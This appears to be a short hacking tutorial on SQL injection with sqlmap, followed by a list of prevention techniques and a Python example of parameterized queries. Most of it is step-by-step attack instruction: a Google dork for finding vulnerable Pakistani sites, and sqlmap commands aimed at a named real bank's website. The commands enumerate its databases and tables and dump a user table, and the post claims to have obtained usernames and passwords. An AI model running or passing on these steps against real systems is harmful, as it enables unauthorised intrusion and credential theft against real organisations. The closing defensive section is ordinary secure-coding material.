SQL Injection Using SQLMAP
Requirements:
SQLMAP Script (Download)
Python interpreter
STEP 1:
Identifying the target:
Use a Google dork to find the target. Search for the following:
inurl:.php?id= site:.pk
STEP 2:
Check for the vulnerability in the URL by passing a ' (single quote).
If it returns an error, then it's hackable.
STEP 3:
Open PowerShell and navigate to the folder where sqlmap is kept.
STEP 4:
Find the names of the available databases. Type the following command in PowerShell:
python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs
STEP 5:
Find the tables in the database. Type the following command:
python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" -D fcibankc_fci_urdu --tables
STEP 6:
Dump the data inside a table (any table of interest).
Type the following command:
python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" -D fcibankc_fci_urdu --T user --dump
We got the username and password.
SQL injection prevention techniques:
Primary Defenses:
Option 1: Use of Prepared Statements (with Parameterized Queries)
Option 2: Use of Stored Procedures
Option 3: Whitelist Input Validation
Option 4: Escaping All User Supplied Input
Additional Defenses:
Also: Enforcing Least Privilege
Also: Performing Whitelist Input Validation as a Secondary Defense
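Options 1 and 3 side by side with the string-built query they replace, as an added example that is not code from the original post. It uses Python's built-in sqlite3 module; the pages table, the function names and the sample GUID are constructed for illustration.

```python
import re
import sqlite3

# Allow-list (Option 3): a page id is a GUID in braces and nothing else.
PAGEID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")

GOOD_ID = "{11111111-2222-3333-4444-555555555555}"  # constructed sample value


def make_db():
    """In-memory database with one constructed row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (pageid TEXT PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO pages VALUES (?, ?)", (GOOD_ID, "About us"))
    return db


def get_page_concatenated(db, pageid):
    # BEFORE: the value becomes part of the SQL text, so a stray quote
    # changes the statement itself (the error seen in Step 2).
    sql = "SELECT title FROM pages WHERE pageid = '" + pageid + "'"
    return db.execute(sql).fetchone()


def get_page_parameterized(db, pageid):
    # Option 1: the placeholder keeps the value out of the SQL text;
    # the driver passes it to the engine as data only.
    return db.execute(
        "SELECT title FROM pages WHERE pageid = ?", (pageid,)
    ).fetchone()


def get_page_validated(db, pageid):
    # Option 3 in front of Option 1: reject unexpected shapes early,
    # then still bind the value as a parameter.
    if not PAGEID_RE.fullmatch(pageid):
        raise ValueError("invalid pageid")
    return get_page_parameterized(db, pageid)


if __name__ == "__main__":
    db = make_db()
    print(get_page_validated(db, GOOD_ID))
    print(get_page_parameterized(db, "'"))
    try:
        get_page_concatenated(db, "'")
    except sqlite3.OperationalError as exc:
        print("concatenated query broke:", exc)
```

The database error from the concatenated query is the signal to look for in application logs; with bound parameters the same input is an ordinary lookup that matches no row.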
Thanks, very informative video :)